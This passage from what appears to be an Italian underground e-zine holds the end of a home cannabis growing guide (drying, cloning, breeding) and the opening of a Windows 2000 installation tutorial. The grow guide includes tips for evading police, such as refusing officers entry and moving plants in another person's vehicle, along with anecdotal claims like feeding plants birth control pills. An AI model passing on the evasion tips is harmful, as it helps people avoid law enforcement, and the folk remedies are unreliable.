allontana, calando rapidamente con l'esposizione alla luce e al vento. Non fare il raccolto troppo tardi! E' facile stare molto attenti e raccogliere dopo che buona parte della potenza se ne è andata. Controlla le piante ed impara a riconoscere il picco della potenza floreale. Non conservare l'erba al sole, perché riduce la potenza. Conservala a lungo stendendo le gemme superiori in basso in uno spazio ventilato. Questo è tutto ciò di cui hai bisogno per avere un gran raccolto. Essiccare in un sacchetto di carta funziona ugualmente, e può essere molto più conveniente. La gemma ha un aroma fantastico quando è essiccata lentamente per la durata di una settimana o due. Se hai molta fretta, è OK essiccare una piccola quantità in-tra fogli di carta o in un sacchetto di carta in un forno a microonde. Vacci piano e controllale, non bruciarle. Posiziona la manopola sulla funzione di scongelamento per una più lenta, migliore essiccazione, sebbene in questo modo sarà un fumo acre. Un disidratatore di alimenti o una macchina per conservare il cibo essiccherà la tua maria in poche ore, ma non avrà lo stesso aroma di una essiccata lentamente, anche se sarà molto simile. E questo accelererà il tuo periodo di raccolto (che può essere snervante, con tutta questa erba sparpagliata ad essiccare). Le gemme secche fino ai gambi sono abbastanza friabili da sbriciolare, conservale quindi in un contenitore sigillato, facendo passare aria e rigirando le gemme ogni giorno per due settimane. Una volta un coltivatore esperto mi ha detto di essiccare in un'area attigua alla casa (come il garage) in modo che la temperatura di giorno si alza e di notte si abbassa, mentre la pianta si essicca. Se tratti la pianta come se fosse ancora viva, questa userà una parte della sua clorofilla durante il processo di essiccazione, ed il fumo sarà meno acre. CLONARE La clonazione è una riproduzione asessuata. Vengono effettuati dei tagli da una pianta madre in crescita vegetativa e vengono immersi in ambiente idroponico per essere coltivati come piante distinte. Il risultato sarà piante identiche in tutto alla pianta madre. La clonazione mantiene le caratteristiche della tua pianta preferita. La clonazione può produrre un oceano di verde da una sola pianta, per questo è un mezzo potente per grandi raccolti, e ti permetterà di riempire uno stanzino rapidamente con le tue piante favorite. Quando trovi una pianta che vorresti ti fosse "amica" per il resto della tua vita, puoi mantenere in vita le caratteristiche genetiche di quella pianta per decenni e passarle ai figli dei tuoi figli. Diffondile e condividile con altri, per conservare una copia, dovesse mai la tua discendenza di piante estinguersi. Un clone può essere preso da un altro clone almeno 20 volte, e probabilmente di più, così non preoccuparti del mito del vigore ridotto. Molti rapporti indicano che non è un problema. La clonazione ti esporrà al rischio di funghi o parassiti che distruggono tutto il raccolto, così è importante scegliere piante che mostrano buona resistenza ai funghi e agli animali nocivi. Scegli la pianta che senti sarà la più affidabile da riprodurre in larga scala, basandoti sullo stato di salute, sul tasso di accrescimento, sulla resistenza ai parassiti e, naturalmente, sulla potenza del fumo. La qualità dell'intensità e del tipo di sballo che avrai, sarà un fattore determinante da non trascurare. Fai dei tagli per clonare prima di spostare le piante dall'area di crescita vegetativa all'area di fioritura. I rami bassi sono tagliati per incrementare la circolazione dell'aria sotto la volta verde. I cloni che hanno attecchito sono spostati nell'area di crescita vegetativa, e i nuovi cloni sono fatti partire nell'area di clonazione usando i tagli dei rami inferiori. Ogni ciclo di crescita impiegherà dalle 4 alle 8 settimane, così puoi coltivare in continuazione in 3 stadi, e raccogliere ogni 6-8 settimane. Alcuni tipi di piante sono più difficili da clonare che altri. E' riportato che le piante con grandi germogli non si clonano molto bene. Una delle mie piante favorite, Mr. Kona, è la più sbalorditiva erba che abbia mai fumato, ma clonarla è veramente un'impresa. Che sfida! Ho osservato altre varietà che avevano attecchito molto più rapidamente, ma poi non mi ha fatto il che minimo effetto! Una volta che hai trovato quella psicoattiva, quasi le proprietà allucinogene di alcuni ibridi Indica/Sativa, non vorrai più fumare un'Indica pura. L'Indica è comunque un fantastico medicinale, così preferisco coltivare anche alcuni pezzi puri. Se fai il raccolto di una pianta, puoi assaggiarlo, e decidere di clonare. Scegli i tuoi favoriti 2 o 3 tipi differenti di piante da clonare, in base all'esito dell'assaggio del raccolto. Le piante che vuoi clonare possono essere rigenerate mettendole sotto luce costante. In poche settimane avrai molti tagli vegetativi pronti per la clonazione e per preservare le tue piante preferite. Tieni sempre una pianta madre in stato vegetativo per ogni specie che vuoi mantenere in vita. Se porti alla fioritura tutti i tuoi cloni, puoi finire con l'eliminare una specie se non possiedi una pianta destinata ad essere madre. Ho ucciso accidentalmente una specie sacra in questo modo; le mie piante, dopo il raccolto, non sono riuscite a rigenerare e la specie si sarebbe completamente estinta se non l'avessi precedentemente data ad amici perché la coltivassero anche loro. Sono stato fortunato, ed un amico mi ha preparato un altro clone di questa specie da coltivare come pianta madre per la produzione di nuovi cloni. Dopo due mesi ogni pianta di marijuana può essere clonata. Piante fiorite possono essere clonate, ma la procedura può essere notevolmente più lunga. E' meglio attendere, e rigenerare vegetativamente piante che hanno subito raccolti. Una singola pianta rigenerata/raccolta può generare centinaia di cloni. Prima di fare dei tagli, lascia la pianta senza azoto per almeno una settimana, in modo che la pianta non diventi estremamente verde, così ci vorrà più tempo per attecchire. Prendi i tagli dal 1/3 più basso della pianta, quando fai una potatura ordinaria. Taglia giovani piccioli da uno stadio vegetativo, una pianta matura alta 8-12 cm con un gambo del diametro di 2,5-5 mm. Tagliala con una lama di rasoio sterile o con un coltello di precisione (passato sul fuoco) ed immergi l'estremità inferiore del taglio del clone in una vasca di acqua distillata con l'aggiunta di 1/4 di cucchiaino di Peters 5-50-17 ogni 4 litri. Poi, taglia via gli ultimi 5 mm mentre viene immersa, facendo un taglio diagonale. Rimuovi il clone dalla vasca e infilalo in una soluzione liquida per cloni seguendo le indicazioni sull'etichetta. Cospargilo di RootToneF e mettilo in vaschetta o in un ambiente per la clonazione. Anche le piante fiorite possono essere clonate, ma ci può volere più tempo, e non può avere un indice di successo molto elevato. Clonare diventa più rapido con le soluzioni liquide per sviluppare le radici, in una vaschetta scaldata e areata, con illuminazione attenuata ed alta umidità. Mettere i tagli in cubi da 3 cm d lana di roccia in una vaschetta funziona ugualmente bene. In uno sgabuzzino puoi recuperare spazio sopra l'area di coltivazione in modo che il calore della lampada scaldi la vaschetta (raccolta passiva) e ti consenta di risparmiare la spesa e la seccatura di un riscaldatore per acquari (24 dollari) o un sistema di riscaldamento agricolo (costoso). Una doppia lampada fluorescente da 10 cm sarà perfetta. Lascia le lampade accese per 24 ore al giorno. I tagli devono mettere radici in 2-3 settimane. Ho trovato solo una soluzione liquida a base di ormoni per mettere radici che non costava oltre i 10 dollari. (Olivia's Gel ne costava 12 per un flacone da 50 grammi. Cazzo, cos'è ' sta roba, oro?) Ho trovato alcuni dipNgrow (lett: immergi e coltiva) per 9 dollari, mi sono ritenuto fortunato, e ho acquistato una vaschetta e un coperchio trasparente per 7 dollari. Un coperchio trasparente per vaschette o una copertura per serre è indispensabile per portare l'umidità al 90% (livello della serra). L'ormone liquido per mettere radici sembra essere molto più efficace delle polveri. Alcuni tipi disponibili sono Olivia's, Woods, e dipNgrow. Miscela una soluzione per cloni diluita di nutrimenti per piante ad alto contenuto di fosforo (high P) come il Peter's 5-50-17, elementi in tracce e sale inglese e quindi immergi le piante in una soluzione per la formazione di radici secondo le istruzioni sull'etichetta. Tutti i nutrimenti sopra citati dovrebbero essere aggiunti in quantità estremamente piccole, il 25% di ciò che normalmente sarebbe usato per crescere le piante. O serviti di una soluzione già preparata come l'Olivia's Rooting Solution. E' stato riportato che lo sciroppo di mais integra la richiesta di zuccheri da parte della pianta durante la fase della clonazione, dal momento che è composto di zuccheri vegetali. Usa anche un fungicida in polvere, come il RoottoneF per accertarti che i cloni non marciscano grazie ai funghi. Questo è importante, dal momento che i cloni e i funghi gradiscono le condizioni che hai ricreato per un buon attecchimento: luce mite; 22-26 gradi; umidità elevata. Nella lana di roccia non c'è alcun bisogno di ossigenare la soluzione, soltanto tieni i cubi in 0,5 cm di soluzione in modo che loro stiano stabili e continuamente inumidite. Cerca di tenere i cloni uniformemente distanziati, e spruzza loro acqua una volta al giorno per mantenerli umidi e freschi. Togli i cloni se sono malaticci e morenti, per tenerli a distanza da quelli sani. Un altro metodo è quello di tenere a galla i tagli in una vaschetta piena di soluzione su pannelli di polistirene (polistirolo) a disposizione, o fogli di stirene (materiale per spedizioni/imballaggi) con buchi fatti con un punzone, in modo che le cime e le foglie siano fuori dall'acqua. Togli tutte le foglie grandi, lasciando solo le foglie più piccole in cima per ridurre la domanda nei nuovi gambi che mettono radici. Ossigena la soluzione della vaschetta con una pompa d'aria e una pietra pomice. Tieni la soluzione a 22-26 gradi per ottenere i migliori risultati. Cambia la soluzione ogni giorno se non usi una pietra pomice e una pompa, in modo che l'ossigeno sia sempre disponibile ai cloni. Una settimana più tardi, stacca le foglie gialle dai tagli per ridurre la richiesta d'acqua quando i cloni cominciano a mettere radici e attecchiscono. Compra una vaschetta con un coperchio trasparente appositamente studiato per la formazione delle radici in un negozio specializzato in articoli per giardinaggio al coperto. Devi tenere l'umidità molto alta per i cloni. Metti i tagli in una vaschetta per il ghiaccio coperta con cellophane ed una luce brillante in basso se non vuoi spendere soldi per la vaschetta e il coperchio. E' anche possibile piazzare direttamente un taglio bagnato in un blocco umido di schiuma floreale con buchi fatti con punzoni, o vermiculite in una tazza; assicurati che i tagli attecchiscano in un ambiente costantemente umido. Cubetti di torba in bustine non sono raccomandati, come indicano risultati di rapporti pubblicati secondo i quali non erano buoni per i cloni che devono mettere radici. Metti i cubetti iniziali in una vaschetta di soluzione. Controlla due volte al giorno per essere sicuro che i cubi siano umidi, non inzuppati, né asciutti. Dopo di 2-3 settimane, appariranno delle radichette in fondo ai baccelli. Trapianta a questo punto all'area di coltivazione, facendo attenzione a non scompigliare ogni radice esposta. Un coltivatore ci scrive: Ho virtualmente cercato di far attecchire tutti i cloni attenendomi a questo schema: 0. Prepara i tagli rimuovendo le foglie grandi sulla punta; lascia che si riprenda dal taglio. 1. Mentre li tieni immersi in acqua, fai un taglio diagonale sull'estremità inferiore del gambo affinché metta radici. 2. Immergili in Rootone, quindi infilza il gambo per circa 5 cm in una vaschetta da mezzo chilo con metà vermiculite, metà perlite, che hai messo in un raffreddatore di polistirolo. 3. Spruzza i tagli con una completa soluzione fertilizzante molto leggera. 4. Copri la cima del raffreddatore con Saran Wrap, quindi fai dei buchi per la ventilazione. 5. Tieni il raffreddatore ad una temperatura relativamente mite, luce bassa, e spruzza i tagli giornalmente. 6. I tagli devono mettere radici in circa 3 settimane. La clonazione non è semplice quanto cominciare dai semi. Con i semi puoi avere piante alte 50 cm in 6 settimane o meno. Con i cloni ci possono volere 6 settimane perché la pianta germogli le radici e la nuova crescita. I semi risultano facilmente due volte più veloci se possiedi uno spazio interno vuoto inutilizzato che richiede di essere messo in uso rapidamente. Riproduci sempre poche gemme per produrre semi, anche se ritieni di clonare per la maggior parte del tempo, potresti perdere tutto e non avere nulla, e in tal caso i tuoi semi potrebbero salvarti il culo. Clonare nella lana di roccia sembra funzionare alla grande, e non è richiesta alcuna pompa d'aria. Ho pagato 9 dollari per 98 cubi di lana di roccia per cominciare. Una vaschetta di plastica è disponibile per 0,95 dollari e contiene 77 cubi in caselle consentendo ai cubi di essere tenuti in un contenitore di soluzione nutriente. Possono essere facilmente rimossi e messi in un cubo più grande di lana di roccia per la coltivazione quando i tagli cominciano a mettere radici. RIPRODUZIONE E' possibile riprodurre e scegliere più velocemente i tagli da piante che crescono, fioriscono, e maturano. Alcune piante saranno naturalmente migliori di altre a questo riguardo, ed è facile selezionare non solo le piante più potenti da clonare o riprodurre, ma ugualmente le piante che crescono/fioriscono più velocemente. Trova la tua pianta dalla crescita più rapida, e riproducila con il tuo maschio "dalla miglior altezza" per una rapida fioritura e una potente discendenza della specie. Clona la tua pianta più rapida, più alta per avere un giardino a singolo raccolto nel minor tempo possibile. Con il passare del tempo, risparmierai una bella attesa nel maturare le tue piante. Quando un maschio comincia a fiorire (2-4 settimane prima delle femmine) dovrebbe essere allontanato dalle femmine in modo che non possa impollinarle. Deve essere portato in un'area separata. Ogni posto che garantisce solo qualche ora di luce al giorno dovrebbe essere adeguato, anche vicino ad una finestra in una stanza separata all'interno della casa. Metti un giornale o un vetro sotto la pianta maschio per raccogliere il polline quando i fiori lo emettono. Tieni un maschio vivo indefinitamente incurvandone la cima rigidamente e mantenendolo in uno stato di shock non forte in modo da ritardarne la maturazione. Oppure prendi le cime quando maturano e metti i rami in acqua, sopra un pezzo di lastra di vetro. Scuoti i rami ogni mattina perché rilascino il polline sopra il vetro e quindi scartalo con una lama di rasoio per raccoglierlo. Un maschio potato in questa maniera resta vivo indefinitamente e continuerà a produrre fiori se riceve adeguati periodi di buio. Questo è molto meglio che mettere il polline nel congelatore! Il polline fresco è sempre meglio. Salva il polline in un sacchetto a prova d'aria nel congelatore. Sarà buono per circa un mese. Possono passare più e più settimane prima che le femmine siano pronte per l'impollinazione. Metti una carta assorbente nel sacchetto con il quale agire una volta scongelato. Una pianta è pronta per l'impollinazione 2 settimane dopo che i grappoli dei fiori femmina appaiono per la prima volta. Se la impollini troppo presto, non può funzionare. Aspetta fino a quando i fiori femmina si sono formati bene, ma soprattutto quando i peli stanno comparendo. Spegni tutti i ventilatori. Usa un sacchetto di carta per impollinare un ramo di una pianta femmina. Usa polline diverso preso da due maschi su rami separati. Copri il sacchetto attorno al ramo e sigillalo all'inizio del ramo. Scuoti il ramo vigorosamente. Bagna il sacchetto di carta dopo alcuni minuti con uno spruzzatore e quindi rimuovilo con molta attenzione. Usa anche grandi borse di plastica con chiusura a lampo. Infila la borsa sul ramo del maschio e scuoti il polline che si libera. Rimuovi attentamente quello cattivo e chiudi la lampo. Dovrebbe essere ricco di polvere di polline. Per impollinare, mettilo sopra un singolo ramo della femmina, chiudendo la lampo lateralmente intorno al gambo in modo che nessun polline sfugga all'esterno. Scuoti la borsa ed il gambo allo stesso tempo. Lasciali stabilirsi per un'ora o due e scuotila di nuovo. Toglila alcune ore più tardi. Il tuo ramo è ora ben impollinato e deve mostrare i segni di una visibile produzione di semi in 2 settimane, con semi maturi che fendono i calici entro 3-6 settimane. Un ramo impollinato può produrre centinaia di semi, così in molti casi non dovrebbe essere necessario impollinare più di uno o due rami. Quando incroci due varietà diverse, verrà creato una terzo tipo di pianta. Se conosci quali caratteristiche stai cercando in una specie nuova, avrai bisogno di diverse piante da scegliere per avere una probabilità maggiore di trovare tutte le qualità desiderate. Qualche volta, se le due piante incrociate possiedono geni dominanti per determinate caratteristiche, sarà impossibile ottenere la pianta che desideri da un singolo incrocio. In questo caso è necessario incrociare due piante dallo stesso lotto di semi risultanti dall'incrocio iniziale. In questo modo si potranno liberare i geni recessivi, e le caratteristiche della pianta che desideri possono essere ottenute solo in questa maniera. Di solito, è preferibile incrociare soltanto due specie che sono molto differenti. In questa maniera uno solo normalmente arriva al punto descritto come "vigore ibrido." In altro parole, spesso le specie migliori sono create prendendo due specie molto diverse tra loro ed accoppiate. Le piante meno robuste possono essere il risultato di un incrocio, dal momento che assimilano i tratti del gene recessivo che può portare ad una diminuzione della potenza. La specie ibrida sarà completamente differente l'una dall'altra. Ogni pianta cresciuta dallo stesso lotto di semi raccolti dalla stessa pianta, sarà diversa. E' quindi necessario provare ciascuna pianta separatamente e decidere per ognuna se le caratteristiche sono di tuo gradimento. Se trovi una che sembra essere di gran lunga superiore alle altre in termini di fioritura precoce, alta produttività e che ti dà uno sballo strafico, quella è la pianta da clonare e da riprodurre in continuazione. La genetica avanzata va ben oltre lo scopo di questo lavoro. Consulta: 'Marijuana Botany' (Botanica della Marijuana) di Smith, per informazioni più dettagliate su questo campo. SINSEMILLIA Quando ad una pianta femmina non è permessa l'impollinazione, cresce ricca di resina indispensabile per la produzione dei semi. Falsi baccelli si gonfiano con resina carica di THC ed i pistilli diventano rossi ed arancioni e si ritirano nei baccelli. Allora è il momento di fare il raccolto alla pianta. I semi non fanno parte della gemma quando i fiori maturano. Questo si chiama Sinsemillia e significa semplicemente "senza semi". IMPOLLINAZIONE E' possibile incrociare le tue due piante femmine favorite per generare una nuova specie di semi che produrrà tutte le piante femmine. Preferibilmente, queste due piante dovranno essere di tipo differente, non da semi provenienti dalla stessa madre. Questo creerà la specie migliore, dal momento che non porterà all'incrocio. E' più facile stimare la qualità delle piante femmine rispetto a quelle maschio, visto che il fumo è più potente e più facile da giudicare è la qualità migliore. Le piante nate da semi in questa maniera saranno tutte piante femmine perché non ci sarà la possibilità di avere cromosomi maschio da genitori femmina. Usa Acido Gibberellico (gibberellina) su un ramo di una pianta femmina per produrre fiori maschi. L'Acido Gibberellico viene venduto nei negozi di articoli per serre che tengono prodotti per la riproduzione e ibridazione di piante. Spruzzalo sulla pianta una volta ogni giorno per 10 giorni con 100 parti per milione di acido gibberellico. Quando si formano i fiori maschi, impollina i fiori dell'altra pianta femmina che hai scelto. Impollina soltanto un ramo a meno che tu non voglia un fottio di semi! Una volta che il ramo ha fiori maschi, taglia il ramo e mettilo ad attecchire in acqua, con un vetro al di sotto per recuperare il polline maschio quando cade. Usa una soluzione per mettere radici simile alla precedente soluzione per la clonazione. Raccogli il polline con un sacchetto di plastica messo sul ramo e scuotilo. Usa una lama di rasoio per accumulare il polline caduto ed aggiungere pure quello nel sacchetto. E' anche possibile impollinare i fiori della pianta su cui crei i fiori maschi, incrociandoli con se stessi. Questo viene usato per conservare le caratteristiche di piante speciali. Anche con la clonazione si conservano le caratteristiche delle piante, ma non si potranno conservare i semi per impiegarli in un secondo tempo. Incrociare una pianta con se stessa può portare a problemi di incrocio, così non può essere una soluzione definitiva nella maggior parte dei casi. Una volta ho provato ad usare acido gibberellico, spruzzato su una femmina sana, ogni giorno per oltre una settimana. Non è apparso alcun fiore maschio sulla pianta. I suoi benefici pertanto possono essere variabili. ODORI E IONI NEGATIVI Generatori di ioni negativi sono stati usati per anni per ridurre gli odori in una stanza di coltivazione, ma sono giunti rapporti secondo i quali un generatore di ioni negativi aumenta la velocità di accrescimento e la produzione. Non c'è alcuna evidenza che possa confermarlo, comunque ha un senso, dovuto al fatto che le persone e gli animali sembrano essere alterati positivamente dagli ioni negativi nell'aria, così a maggior ragione possono "sentirsi" meglio le piante. Prova a metterne uno nella stanza di coltivazione. Puoi notare come le gemme non hanno molto aroma quando le cogli, ma che in alcuni casi può risultare gradevole. Un generatore di ioni negativi può essere acquistato per 15, 100 dollari a seconda del modello e della potenza erogata. Alcuni hanno cicli invertiti che accumulano la polvere in un piatto caricato. E' anche possibile usare una lamina di alluminio con la messa a terra e porla sul muro o sulla mensola dove si trova lo ionizzatore, per raccogliere queste particelle. Soltanto pulisci completamente la lamina una volta al mese. Dovrebbe essere collegata ad un cavo elettrico di messa a terra. Se non ricopri il muro e la mensola con una carta o una lamina, il muro diventerà nero dalla polvere che riceve dall'aria, e poi ti toccherà ridipingerlo. OSSIGENO L'O2 alle radici è un grande problema, dal momento che la pianta lo richiede per assimilare i nutrimenti, e liberarli dalle tossine, ecc... Una delle cose più facili da fare è servirsi di cibo a base di perossido di idrogeno nell'acqua per aumentare la disponibilità di ossigeno nell'acqua stessa. H2O2 ha un atomo di ossigeno in più che si dividerà facilmente e che potrà essere usato dalla pianta. Oxygen Plus è un alimento per piante che contiene il 25% di perossido di idrogeno ed è perfetto per questo uso. Usando una soluzione per piante che permette una abbondante ossigenazione è lo stesso veramente importante. Assicurati di avere un buon drenaggio usando Perlite, sabbia, o ghiaia nella tua miscela e nel fondo dei vasi. Non usare un mezzo che trattiene troppa acqua, o puoi significativamente ridurre l'ossigeno a disposizione della pianta. Più su questo argomento nella sezione 'Colture idroponiche'. Ossigenare l'acqua prima dell'innaffiamento è altrettanto una buona idea. Nel caso di piante in vasi di terra, usa una pompa d'aria per gassare l'acqua durante la notte prima di innaffiare le tue piante, o metti l'acqua in un contenitore con un coperchio e scuotilo molto bene prima di somministrarla alle piante. SICUREZZA E RISERBO Le società elettriche possono rivelare che la tua bolletta è molto cambiata rispetto allo stesso periodo dell'anno precedente, e in questo modo la polizia riesce a beccare i coltivatori. Più di 500 watt utilizzati in continuazione all'interno di una famiglia potranno far sì che si venga segnalati per incremento mensile costante nel consumo di energia elettrica. Puoi dire di avere un riscaldamento autonomo, molte persone che vivono in fabbricati lo possiedono, e anche molti televisori, accesi anche a tarde ore, se ti fanno un accenno (senza malizia). Se bussano gli sbirri e te lo chiedono, non lasciarli entrare, e sposta le tue piante in un altro posto durante le ore piccole, magari in un veicolo non di tua proprietà. Una volta spostate in un nuovo posto, può essere preferibile ripristinare immediatamente un alto consumo di energia, in modo che la cronologia del tuo consumo energetico non smascheri le tue attività in futuro. Fuoriuscite di luce, finestre aperte, calore emanato da stanze che normalmente dovrebbero essere fredde, e bollette salate sono tutti problemi seri di cui dovresti preoccuparti. Non lasciare acceso l'allarme antifurto quando vai via da casa. Molte persone sono state arrestate quando dei marmocchi cercavano di rubare il prezioso giardino e sopraggiungeva la polizia. Chiudi bene la casa, e lascia che le prendano se ne hanno proprio bisogno. In fondo non vale la pena essere arrestati per furto... Pensa in anticipo ad ogni situazione che richiederà una visita alle aree sensibili della casa da parte di estranei. Riparatori, venditori a domicilio, letturisti del gas-luce-acqua, vicini, periti stimatori, ed animali domestici devono tutti essere considerati e di conseguenza bisogna pianificare in anticipo. ACQUA DISTILLATA Alcuni coltivatori riportano che acqua purificata o distillata aiuta le loro piante a crescere più velocemente. Forse ciò è dovuto al sodio e ai metalli pesanti che si trovano nell'acqua pesante che non sono presenti nell'acqua purificata. L'acqua pesante tende a formare depositi di sale alcalino nel terreno che bloccano i minerali in tracce, e provocano carenze di ferro, rame e zinco. Ci sono diversi tipi di acqua purificata, ma molti non sono privi di minerali che possono causare la formazione di sale per un esteso periodo di tempo. L'acqua di rubinetto arriva in due modi. Calda e fredda. Il tubo che porta l'acqua fredda ha una minor formazione di calcio e sodio al suo interno, e dovrebbe essere privo di sedimenti una volta che il rubinetto è stato aperto e l'acqua è lasciata scorrere per 30 secondi. L'acqua calda avrà ruggine, depositi di piombo, e molto sodio e calcio, tanto che te ne accorgerai facilmente. Usa solo la quantità di acqua calda richiesta per raggiungere la corretta temperatura dell'acqua (20-25°C). L'acqua di rubinetto filtrata attraverso un filtro di carbone sarà priva di cloro e di particelle molto grandi, ma conterrà ancora solidi disciolti come sodio e metalli pesanti (piombo, arsenico, nichel, ecc...). L'acqua purificata in bottiglia dovrà essere o Reverse Osmosis o alcuni tipi di acqua filtrata carbone/sedimento. Quando acquisti l'acqua in un negozio, a meno che sia RO o Distillata, fai a meno di comprarla. Può avere ancora gli stessi solidi disciolti e metalli pesanti che ha la tua acqua di rubinetto. PILLOLE ANTICONCEZIONALI Una soluzione con una pillola in 4 litri di acqua è stato riportato che provoca un aumento della velocità di accrescimento nelle piante di pomodoro. E' possibile che questo aiuti anche le piante di maria. Un trattamento somministrato prima della fioritura ed uno alcune settimane prima del raccolto potrebbe aiutare la pianta a maturare più velocemente. Un coltivatore ci ha riportato una storia su di uno stesso tipo di piante, una trattata con estrogeni è cresciuta fino a 6 metri, mentre l'altra è rimasta a 2 metri. Questo può essere puramente aneddotico, ma potrebbe funzionare. Provalo e riferiscici i risultati. CONSERVAZIONE DI SEMI E GEMME Usa un barattolo sigillato di quelli per conservare alimenti per sigillare ermeticamente il sacchetto sotto vuoto. Congelalo o mettilo in frigo, e le gemme e i semi possono essere conservati per anni in questo modo. Sbatti i semi in una carta assorbente per assorbire l'umido. Conservali nel congelatore, e togli solo tanti semi quanti te ne servono, quindi rimettili subito nel congelatore. COMMENTO FINALE Ottimi risultati possono essere conseguiti anche in situazioni che possono apparire alquanto marginali. (ad esempio: un vaso da 10 cm in una stanza con un lucernario). Con un minimo di: ambiente di coltura ben drenato, buona luce con ventilazione, applicazione regolare di un fertilizzante completo, controllo dei parassiti, e precauzioni antisgammo, chiunque può portare un seme vitale alla maturazione. Uno non ha necessariamente bisogno di possedere molti soldi, o anche conoscenze specifiche, per coltivare buone piante. Un ringraziamento speciale a Romanoff ke mi ha affascinato e mi ha fatto entrare nel fantastico mondo della Maria e dell' Ash!!! un 10x anke a Niki a Cico e a Giulia ke pur nn appoggiandomi completamente mi ha aiutato!!! e come nn ringraziare Syn??!! ........ mmmmmm ecco.....io......vabbe' V.P.N. strunz'! BUON RACCOLTO A TUTTI!! Phaet (se volete qualke consiglio vesa8_34@yahoo.it) -----------------------------------------=Miscellanea=----------------------------------------- ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø ø GUIDA ALLA FACILE INSTALLAZIONE DI WINDOWS 2000 ø ø sYn&Norman^B^ ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø Disclaimer: Questa guida e' basata solo sulla mia conoscenza personale, e non dovrebbe essere considerata come un'alternativa alla procedura d'installazione certificata da Microsoft. L'autore non si prende responsabilita' per altrui azioni. __________________________________________________________________ Questo è il primo articolo di una serie che sara' riguardante Windows2000 (ebbene sì). =====> Una piccola premessa sulla famiglia Microsoft Windows 2000 <===== Questo tutorial insegnera' come fare un'istallazione di Windows 2000 in modo facile, scorrevole e senza difficolta'. Per prima cosa bisogna decidere che tipo di ditribuzione andremo ad installare, Microsoft ha rilasciato (per ora) tre Windows2000: * Windows 2000 Professional * Windows 2000 Server * Windows 2000 Advanced Server * Windows 2000 Datacenter Server Microsoft Windows 2000 possiamo definirlo NT questo perchè "E' stato realizzato con la tecnologia NT" .Questo rappresenta anche un vero appoggio multi-lingue, infatti offre vari packs di varie lingue. Cio' significa: == Avere la stabilita' e le performance della tecnologia NT == Windows 2000 prende dei tradizionali valore dei sistemi NT: stabilita', performance e sicurezza delle informazioni. Che permette un'alta sicurezza delle informazioni dando all'utente la possibilita' di criptare il file system (EFS), assegnare uno spazio nascosto e sicuro per usare VPN, liberare il sistema di sicurezza Kerberos, funzioni multiutente, e molto altro. == Abbassare il costo totale del possesso == Windows 2000 ha molte caratteristiche incorporate, come l'IntelliMirror e le Active Directories. Queste caratteristiche permettono soluzioni piu' efficienti per la gestione del sistema. [== Differenti Edizioni ==] -> L'edizione Professional e' progettata per gli utenti privati o le piccole aziende, o come dice Microsoft, "E' Un sistema operativo desktop per gli affari in Internet". -> L'edizione Server e' studiata per l'organizzazione di reti avanzate. Include molta gestione dei server della rete, nonche' utility per l'amministrazione. Contiene Active Directories, Kerberos, i sistemi PKI, Windows Terminal Services, e molte altre utility. Windows 2000 Server supporta fino a 4GB di RAM e 4 processori. -> L'edizione Advanced Server e' stata rilasciata per per le aziende e le corporazioni piu' grandi. Contiene il supporto per 8 processori, una eccellente gestione delle applicazioni, e una stabilita' sorprendente. L'edizione Advanced Server contiene l'Enterprise Memory Architecture - EMA, il sistema multiprocessione simmetrico - SMP, e la gestione avanzata dei database. Focalizzero' l'articolo sulla versione Professional, perche' e' progetata per le case e per le piccole industrie, mentre le altre due sono dedicate alle aziende piu' grandi. Presuppongo che tu sia gia' in possesso del disco di installazione quindi non ti spiegero' dove trovarlo e quanto costa. Per comprarlo rivolgiti ad un rivenditore di software. =====> "Comincino le danze" oppure Installare Windows 2000 <===== [=== Installazione completa o Aggiornamento ===] Questa domanda mi e' stata rivolta molte volte ma la risposta e' molto semplice: dipende dalle tue necessita'. Vediamo i pro e i contro di una installazione completa e dell'aggiornamento. - Il miglior vantaggio di un'installazione completa e' che si e' salvi dalle varie incompatibilita' dei drivers. Se installi Win2000 su una precedente installazione di Windows, Win2k potrebbe usare vecchi driver presenti sul sistema, causando instabilita'. - D'altro canto, e' ovvio che aggiornando il sistema non si perdono i vecchi programmi. Quindi la scelta e' solo tua. Per essere piu' sicuri della stabilita' fai un'installazione completa, ma se non puoi reinstallare tutto il tuo software che avevi fai un'aggiornamento. -> Il Setup <- (Nota: scegli il modo piu' conveniente per avviare l'installazione. La prima e' valida sia per l'aggiornamento che per l'installazione completa) Avvio del Setup 1: Ora, dopo aver fatto questa importante decisione, inserisci il cd di Win2000 nel lettore sotto windows, e aspetta l'avvio automatico (se il setup non parte automaticamente avviarlo eseguendo il file "Setup.exe" nella directory principale del cd). Nella prima schermata, scegli tra Aggiornamento o installazione completa. Avvio del Setup 2: (Solo per installazione partendo da zero) Nel caso che tu non abbia Windows gia' installato, puoi avviare il sistema direttamante dal cd. Prima cosa, abilita il boot dal cd nel BIOS del sistema (fai attenzione, non cambiare nulla di cui non sei sicuro, consulta ben il manuale della scheda madre), Quindi inserisci il cd e avvia il computer. Se il tuo BIOS non puo' avviare il pc dal cd-rom, puoi creare il dischetto di avvio col programma apposito incluso sul cd di installazione (\bootdisk\makeboot.exe). Installazione (configurazione di base e copia dei file) Segui le istruzioni del setup che ti compariranno sullo schermo per le prime configurazioni di base. Dopo qualche diagnosi del sistema, il setup incomincera' a copiare i file. Dopo che questa operazione e' terminata il setup resettera' il sistema e lo fara' partire in Windows 2000 per il prossimo passo dell'installazione. Questa fase dell'instalalzione sembra svolgersi in dos, ma in realta' si svolge gia' in Windows 2000 [== NTFS o FAT? ==] Il file system NTFS e' piu' veloce, affidabile, ed ha piu' qualita' che il sistema FAT32 o FAT. Io raccomando di scegliere di convertire il drive in NTFS. Ma, nota bene che nel caso tu abbia un sistema con due boot, L'altro sistema operativo non riconoscera' la partizione NTFS, per esempio se hai installato anche win95 e il dos, questi non saranno in grado di leggere quella partizione. [== Componenti da installare ==] Questa e' una tua decisione personale, dipende dalle tue necessita'. Io posso solo descrivere i componenti piu' importanti e le loro funzionalita'. * IIS - Internet Information Services: Nel caso tu debba avere il tuo web, ftp, e/o il server mail, installa il pacchetto. Un altro uso per l'IIS e' la prova locale dei file ASP, che ricjiedono appunto l'installazione dell'IIS web server. Comunque, puoi sempre installarlo o rimuoverlo in seguito dal pannello di controllo. IIS permette di creare piu' siti su un solo indirizzo IP, e rende facile creare siti intranet.IIS contiene il supporto per il contenuto 